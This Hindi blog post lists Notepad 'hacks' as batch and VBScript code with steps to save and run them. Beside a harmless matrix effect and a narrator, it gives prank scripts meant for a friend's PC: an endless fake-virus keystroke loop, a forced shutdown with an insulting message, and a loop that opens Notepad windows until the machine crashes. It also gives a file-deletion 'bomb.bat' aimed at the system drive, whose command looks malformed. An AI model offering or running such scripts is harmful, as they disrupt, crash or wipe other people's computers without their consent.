कुछ मजेदार और सहायक कंप्यूटर ट्रिक्स क्या हैं?

 

कुछ मजेदार और सहायक कंप्यूटर ट्रिक्स क्या हैं?

विंडोज के नोटपैड को शायद आप एक साधारण ब्लॉटवेयर समझते होंगे, पर यह इससे बढ़कर है। इस साधारण एप्लीकेशन से आप नुकसान न पहुँचाने वाला एक कृत्रिम वायरस (Artificial Virus) तैयार कर सकते हैं। या फिर एक नैरेटर प्रोग्राम, जो आपके द्वारा टाइप किए गए शब्दों का उच्चारण करे। तो चलिए जानते हैं ऐसे-ही कुछ मज़ेदार पर असरदार नोटपैड के हैक्स के बारे में—

हैक 1. मेट्रिक्स कोड इफ़ेक्ट:

आपने फिल्मों में एक प्रोफेशनल हैकर द्वारा चुटकियों में कंप्यूटर्स हो हैक करते देखा होगा। साथ में हैक किये गए कंप्यूटर की स्क्रीन पर हरे रंग के अक्षर भी दिखाए जाते हैं। कुछ इस तरह—

आप इसे अपने कंप्यूटर में तैयार कर सकते हैं वो भी नोटपैड की सहायता से (वैसे यह कोई वायरस नहीं है :) बस नीचे बताए गए स्टेप्स को फॉलो करें—

Step 1: सबसे पहले नोटपैड ओपन कर लें।

Step 2: अब नीचे दिए गए कोड को कॉपी कर लें और इसे नोटपैड में पेस्ट कर दें।

कोड यह है—

  1. @echo off 
  2. color 02 
  3. :tricks 
  4. echo %random%%random%%random%%random%%random%%random%%random%%random% 
  5. goto tricks 

Step 3: अब ऊपर टैब में 'File' पर क्लिक करें और ओपन होने वाली मेन्यु में 'Save as' का चयन करें। चाहें तो आप सेव करने के लिए Ctrl+S शॉर्टकट का भी प्रयोग कर सकते हैं।

Step 4: यह सबसे महत्त्वपूर्ण स्टेप है। इसे सेव करने के लिए आप कुछ भी नाम दे सकते हैं, बस ध्यान रहे नाम के बाद में आपको .bat भी जोड़ना होगा (आपकी फाइल के नाम के अंतिम अक्षर और .bat के बीच स्पेस नहीं होना चाहिए).

उदहारण— यहाँ हमने इस फाइल को filename.bat नाम दिया है इसे आप filename .bat लिखने से बचें। अर्थात् स्पेस न दें।

अब बस इस फाइल को ओपन करें और मजा करें :)

अन्य स्क्रिप्ट भी स्टेप 3 व स्टेप 4 की तरह ही सेव होंगी, इसलिए यह प्रोसेस याद रखें।


हैक 2. कीबोर्ड बिना-रुके कुछ भी टाइप करने लगेगा:

इस हैक की मदद से आप एक ऐसा नुकसानरहित वायरस जैसा कुछ बना सकते हैं। जैसे ही कोई इस फाइल को ओपन करता है और फिर यह कहीं भी (जहाँ आप कुछ टाइप करने की कोशिश करते हैं) वहीं कोई विशेष मैसेज खुद-बी-खुद टाइप होना शुरू हो जाएगा।

इसे शब्दों में बताना बहुत मुश्किल है, एक बार आप इसे जरूर ट्राय करें।

इस स्क्रिप्ट का कोड यह रहा—

  1. Set wshShell = wscript.CreateObject("WScript.Shell") 
  2. do 
  3. wscript.sleep 100 
  4. wshshell.sendkeys "This is a Virus. Your system have been infected." 
  5. loop 

इस स्क्रिप्ट में आप "This is … infected" की जगह कोई भी वाक्य का प्रयोग का सकते हैं।

सेव करने की प्रक्रिया वैसी-ही है, बस इस बार आपको .bat के स्थान पर .vbs एक्सटेंशन लगाना है। उदहारण— keyboardvirus.vbs

इसके प्रभाव को ख़त्म करने के लिए आपको अपना सिस्टम फाॅर्स रीस्टार्ट करना पड़ेगा। इसलिए आपको सलाह दी जाती है कि इसे अपने प्रिय मित्र के पीसी पर ही ट्राय करें :) साथ ही इसे इस्तमाल करने से पहले सभी जरूरी विंडोज को बन्द कर दें।


हैक 3. आप टाइप करें, आपका कंप्यूटर उसे पढ़कर सुनाएगा:

इस हैक की सहायता से आप एक फ्री नैरेटर बना सकते हैं। यह नैरेटर, जो आप टाइप करेंगे उसे पढ़कर सुनाएगा।

स्क्रिप्ट कोड यह रहा—

  1. Dim message, sapi 
  2. message = InputBox("A Free Narrator Tool"+vbcrlf,"Text to Audio converter") 
  3. Set sapi = CreateObject("sapi.spvoice") 
  4. sapi.Speak message 

यह .vbs एक्सटेंशन के साथ सेव होगी। उदाहरण— narrator.vbs


हैक 4. एक खास मैसेज के सा कंप्यूटर शटडाउन करें:

यहाँ आप स्क्रिप्ट में कुछ भी मैसेज लिख सकते हैं, फिर जैसे ही आपका दोस्त उस फाइल को ओपन करेगा तब आपके द्वारा लिखा गया मैसेज सामने आएगा और फिर उसका कंप्यूटर शटडाउन हो जाएगा। यह आपके दोस्तों को डराने के लिए काफी है।

स्क्रिप्ट कोड यह है—

  1. @echo off 
  2. shutdown.exe -S -T 10 
  3. CLS 
  4. MSG * I Don’t like your ugly face! 

यह .bat एक्सटेंशन के साथ सेव होगा। उदाहरण— shutdownvirus.bat


हैक 5. सैकड़ों नोटपेड ओपन कर अपने दोस्त का पीसी क्रेश करें:

यह स्क्रिप्ट एक-के-बाद एक नयी नोटपैड विंडो ओपन करता रहता है, जिससे कोई भी कंप्यूटर सेकंडों में क्रेश हो सकता है।

ऊपर दर्शाया गया चित्र मात्र एक रचनात्मक प्रस्तुती है। क्योंकि इस फाइल को ओपन करने के बाद आपको स्क्रीनशॉट लेने का भी मौका नहीं मिलता है!

स्क्रिप्ट कोड यह है—

  1. @ECHO OFF 
  2. :TOP 
  3. START %SYSTEMROOT%\SYSTEM32\NOTEPAD.EXE 
  4. GOTO TOP 

यह .bat एक्सटेंशन के साथ सेव होगा। उदाहरण— notepadaccess.bat


हैक 6. [सीरियस डैमेज कंटेंट] सिस्टम ड्राइव का सारा डेटा फॉर्मेट करें:

इसे कभी अपने या किसी मित्र के पीसी पर ट्राय न करें। यह आपका सारा सिस्टम डेटा डिलीट कर देगा जिससे 99% सम्भावना है कि आपके डेटा के साथ-साथ, विंडोज भी चली जाए। कृपया इसे न दोहराएँ।

इस स्क्रिप्ट कोड से किसी को नुक्सान पहुँचाने का कार्य न करें। हो सकता है कि यह स्क्रिप्ट, किसी सज्जन का सारा महत्त्वपूर्ण डेटा नष्ट कर दे।

कोड यह रहा—

  1. @ECHO OFF 
  2. DEL C:\ *.* |Y 

यह .bat एक्सटेंशन के साथ सेव होगा। उदाहरण— bomb.bat


एक टिप्पणी भेजें

0 टिप्पणियाँ